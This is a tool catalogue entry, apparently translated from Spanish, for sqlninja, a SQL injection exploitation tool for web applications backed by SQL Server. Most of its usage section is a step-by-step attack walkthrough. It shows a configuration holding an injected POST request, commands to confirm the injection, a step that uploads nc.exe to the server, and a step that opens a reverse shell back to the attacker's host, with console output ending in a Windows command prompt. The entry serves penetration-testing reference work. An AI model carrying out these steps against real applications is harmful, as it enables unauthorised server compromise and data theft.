
sqlninja
Phase(s):
Primary: Exploitation.
Secondary: N/A.
Description:
Tool specialized in exploiting SQL injection vulnerabilities in web applications with a SQL Server database backend. Its functionality ranges from data mining to compromising the application server through an uploaded shell.
Objective:
- Compromise the application server by exploiting a SQL Injection.
Features:
Supported technologies: Web applications (HTTP/HTTPS) with a SQL Server database backend.
Operating mode: Active.
- Compromise the application server by exploiting a SQL Injection.
- Provides information about the database configuration.
- Provides a file upload functionality to execute a malicious file on the application server.
- Performs a dictionary-based brute force attack to retrieve the “sa” account password.
- Provides functionality to execute operating system commands.
Reports:
Output reports: X
Basic usage:
Create a reverse shell on the database server. Edit the sqlninja configuration file to include the following information:
- Request containing the vulnerable parameter.
- Local IP address.
The configuration file will be similar to the following:
…
########### HTTP REQUEST ############
# The entire HTTP request, including the exploit string and a marker for the
# SQL command to execute (__SQL2INJECT__)
# Be sure to include the vulnerable parameter and the character sequence that
# allows us to start injecting commands. In general this means, at least:
# - an apostrophe (if the parameter is a string)
# - a semicolon (to end the original query)
--httprequest_start--
POST http://URL/PAGE.aspx HTTP/1.1
Host: HOST_APPLICACION
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:18.0)
OTRAS_CABECERAS
__VIEWSTATE=%2FwEPDwUKMjA3NjE4MDczNmRkf2IECGUitTpu0vVIUhu3wPxao%2FF6r4sHEdlYxzYXX%2F8%3D&
__EVENTVALIDATION=%2FwEWAwLv6%2FCgCgL%2F%2BOneAgKfwImNC3%2Fnbpb9DZ7tw0IU78vRV%2BiuANd7HLE5bz%2B5vRy0MIk6&param_vulnerable=Dato';__SQL2INJECT__&ctl02=Search%21
--httprequest_end--
…
# Local host: your IP address (for backscan and revshell modes)
lhost = localhost
…
Once the configuration is in place, run the tool in test mode; it displays the message “Let's rock !! :)” if the SQL injection is successful.
root@maguey:/tools/explotation/sqlninja # ./sqlninja -m t
Sqlninja rel. 0.2.6-r1
Copyright (C) 2006-2011 icesurfer <r00t@northernfortress.net>
[+] Parsing sqlninja.conf...
[+] Target is: xxx.xxx.xxx.xxx:80
[+] Trying to inject a 'waitfor delay'....
[+] Injection was successful! Let's rock !! :)
Execute the command “./sqlninja -m u” and select the option “apps/nc.exe”.
root@maguey:/tools/explotation/sqlninja # ./sqlninja -m u
Sqlninja rel. 0.2.6-r1
Copyright (C) 2006-2011 icesurfer <r00t@northernfortress.net>
[+] Parsing sqlninja.conf...
[+] Target is: HOST_ATAQUE
Specify the binary or script file to upload
shortcuts:
1: apps/nc.exe
2: apps/dnstun.exe
3: apps/churrasco.exe
4: apps/icmpsh.exe
5: apps/vdmallowed.exe
6: apps/vdmexploit.dll
> 1
[+] Uploading /tmp/nc.scr debug script............
1540/1540 lines written
done!
[+] Converting script to executable... might take a while
[+] Checking that nc.exe has the expected filesize...
[+] Filesize corresponds... :)
The tool uploads the file; the reverse shell is then obtained with the command “./sqlninja -m r”.
root@maguey:/tools/explotation/sqlninja # ./sqlninja -m r
Sqlninja rel. 0.2.6-r1
Copyright (C) 2006-2011 icesurfer <r00t@northernfortress.net>
[+] Parsing sqlninja.conf...
[+] Target is: xxx.xxx.xxx.xxx:80
Local port: PUERTO_LOCAL
tcp/udp [default: tcp]: PROTOCOLO_TCP_O_UDP
[+] waiting for shell on port PUERTO_LOCAL/PROTOCOLO...
Microsoft Windows #### [Version #####]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>whoami
whoami
HOSTNAME\USERNAME
Resources:
Link: http://sqlninja.sourceforge.net/
Author(s): icesurfer
Contact: r00t [at] northernfortress.net
License: GPL version 3